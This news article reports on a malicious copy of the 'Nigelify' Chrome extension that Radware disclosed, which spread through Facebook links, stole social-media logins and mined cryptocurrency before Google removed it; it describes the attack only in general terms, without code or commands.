Chrome users should be careful as to which extensions are downloaded, as in the recent case of a malicious extension that harvested data and mined for digital currencies.
How The Malware Spreads
On Thursday, May 10, cybersecurity company Radware revealed that its machine-learning algorithms recently encountered a zero-day malware that has been active since at least March 2018. More than 100,000 users in over 100 countries received the malware.
The malware reportedly abused a Google Chrome extension called the "Nigelify" application, which replaced pictures online with the character of Nigel Thornberry from the 1990s animated television show The Wild Thornberrys. A malicious script was added to copies of the real extensions in order to spread.
Using engineered links on Facebook, victims were infected by the malware after being redirected to a fake YouTube video. Users were then asked to install the Chrome extension by playing the video.
"This group appears to have been undetected until now thanks to the campaign consistently changing applications and the use of an evasive mechanism for spreading the malware," Radware wrote on its website.
Most of the infected users lived in the Philippines, Venezuela, and Ecuador.
What Does The Malware Do?
The malware victimized users by stealing personal data and by using their computer to mine for cryptocurrency.
First, the malware executed JavaScript to add the computer to part of a botnet to steal data. It primarily went after social media networks, specifically login information for Facebook and Instagram. From there, the malware used the login information to spread to friends of the victim with links.
After stealing the data, the malware began to harvest for the cryptocurrency. It used popular browser-mining software to mine for digital currencies. Recently, the malware has reportedly collected $1,000 in cryptocurrencies, mostly in monero, in less than a week.
Some users became aware of the malware, and they attempted to remove the malicious extension. However, the malware was sophisticated and it was able to prevent the user from deleting it by closing.
Google Responds To The Malware
Once Google learned about the malware, it took action by deleting it. The company also deleted four other similar extensions on the same day.
"We removed the malicious extensions from Chrome Web Store and the browsers of the small percentage of affected users within hours of being alerted," a Google spokesperson told Threatpost.
This isn't the first time this incident happened to Chrome users. A few months ago, Google had to shut down a series of malicious extensions that infected 500,000 users.